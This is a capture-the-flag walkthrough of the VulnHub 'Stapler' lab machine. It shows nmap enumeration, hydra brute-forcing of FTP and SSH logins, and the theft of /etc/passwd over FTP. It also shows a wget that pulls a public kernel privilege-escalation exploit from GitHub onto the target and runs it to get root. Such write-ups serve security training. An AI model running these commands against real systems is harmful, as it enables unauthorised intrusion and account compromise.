Stapler is a boot2root with multiple paths to shell and root, written by g0tmi1k. I found the simple brute force path the most obvious on the first play through but I think I will visit this one again.
Discovery & Enumeration
root@kali:~# mkcd VulnHub/Stapler
root@kali:~/VulnHub/Stapler# netdiscover -pr 10.1.11.0/24
Currently scanning: (passive) | Screen View: Unique Hosts
1 Captured ARP Req/Rep packets, from 4 hosts. Total size: 60
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.11.137 08:00:27:f2:ed:b4 1 60 Cadmus Computer Systems
root@kali:~/VulnHub/Stapler# echo 10.1.11.137 > ip
root@kali:~/VulnHub/Stapler# nmap -A -p- -T5 $(cat ip)
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-29 15:36 BST
Nmap scan report for red.initech.vulnlab.fbcnt.in (10.1.11.137)
Host is up (0.00022s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_ 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
| id.server: patriot.fbcnt.in
|_ bind.version: dnsmasq-2.75
80/tcp open http
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: RED)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 53
| Version: .7.12-0ubuntu1
| Thread ID: 27
| Capabilities flags: 63487
| Some Capabilities: LongPassword, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsTransactions, Support41Auth, FoundRows, Speaks41ProtocolOld, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, ODBCClient, SupportsCompression, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongColumnFlag
| Status: Autocommit
Kv\x12\x19`"dx\s\x01ptM"
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
Host script results:
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED
| Domain name:
| FQDN: red
|_ System time: 2016-06-29T16:38:10+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms red.initech.vulnlab.fbcnt.in (10.1.11.137)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.26 seconds
Anonymous FTP, etc
A lot running on this box, working top-to-bottom anonymous ftp immediately caught my attention so I started there.
root@kali:~/VulnHub/Stapler# lftp -e 'set ftp:passive-mode false' -u anonymous,anonymous $(cat ip)
lftp anonymous@10.1.11.137:~> ls
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
lftp anonymous@10.1.11.137:/> cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
107 bytes transferred
lftp anonymous@10.1.11.137:/> exit
So we have a note for Elly left by John, heavily implying there is an FTP user named Elly.
root@kali:~/VulnHub/Stapler# echo elly > users
root@kali:~/VulnHub/Stapler# hydra -L users -P /usr/share/seclists/Passwords/rockyou-10.txt -e nsr ftp://$(cat ip)
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-29 15:48:02
[DATA] max 16 tasks per 1 server, overall 64 tasks, 95 login tries (l:1/p:95), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.1.11.137 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-29 15:48:06
So Elly clearly isn't very security conscious, as her password is elly. Lets take a look in her FTP account.
She Sells SSH Shells...
root@kali:~/VulnHub/Stapler# lftp -e 'set ftp:passive-mode false' -u elly,ylle $(cat ip)
lftp elly@10.1.11.137:~> ls
drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11
drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi
-rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf
-rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases
-rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db
...
lrwxrwxrwx 1 0 0 23 Jun 03 13:49 vtrgb -> /etc/alternatives/vtrgb
-rw-r--r-- 1 0 0 4942 Jan 08 14:18 wgetrc
drwxr-xr-x 3 0 0 4096 Jun 03 13:51 xdg
drwxr-xr-x 2 0 0 4096 Jun 03 13:51 xml
drwxr-xr-x 2 0 0 4096 Jun 03 15:20 zsh
And her home directory is /etc! Assuming she can't read shadow,
I'll grab password so I at least have a user list.
lftp elly@10.1.11.137:/> get shadow
get: Access failed: 550 Failed to open file. (shadow)
lftp elly@10.1.11.137:/> get passwd
2908 bytes transferred
Okay, so far so good. Lets see if any of the users with shell access have equally terrible password policies.
root@kali:~/VulnHub/Stapler# cat passwd | grep -v /false | grep -v /nologin | grep -v :$ | cut -f1 -d: | sort > users
root@kali:~/VulnHub/Stapler# hydra -L users -e nsr -t 4 ssh://$(cat ip)
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-29 15:54:12
[DATA] max 4 tasks per 1 server, overall 64 tasks, 84 login tries (l:28/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 61.00 tries/min, 61 tries in 00:01h, 23 todo in 00:01h, 4 active
[22][ssh] host: 10.1.11.137 login: SHayslett password: SHayslett
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-29 15:55:39
Bingo! This is almost going too well, we're bound to hit a brick wall soon.
root@kali:~/VulnHub/Stapler# ssh SHayslett@$(cat ip)
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@10.1.11.137's password:
Welcome back!
SHayslett@red:~$ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
And I'm in! I seem to recall a Kernel 4.4 local root exploit a few months ago...
root@kali:~/VulnHub/Stapler# searchsploit Linux Kernel 4.4
------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------- ----------------------------------
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1) | ./linux/local/39277.c
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2) | ./linux/local/40003.c
Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploi | ./linux/local/39772.txt
------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~/VulnHub/Stapler# getsploit 39772
'/usr/share/exploitdb/platforms/linux/local/39772.txt' -> './39772.txt'
root@kali:~/VulnHub/Stapler# cat 39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
...
E-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
That sounds perfect, lets grab it on the target machine and see how we fare...
SHayslett@red:~$ wget -q https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
SHayslett@red:~$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/crasher.tar
inflating: 39772/exploit.tar
SHayslett@red:~$ tar xvf 39772/exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
SHayslett@red:~$ (cd ebpf_mapfd_doubleput_exploit; ./compile.sh; ./doubleput)
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),1005(SHayslett)
There is only one thing left to do!
root@red:~/ebpf_mapfd_doubleput_exploit# cat /root/flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b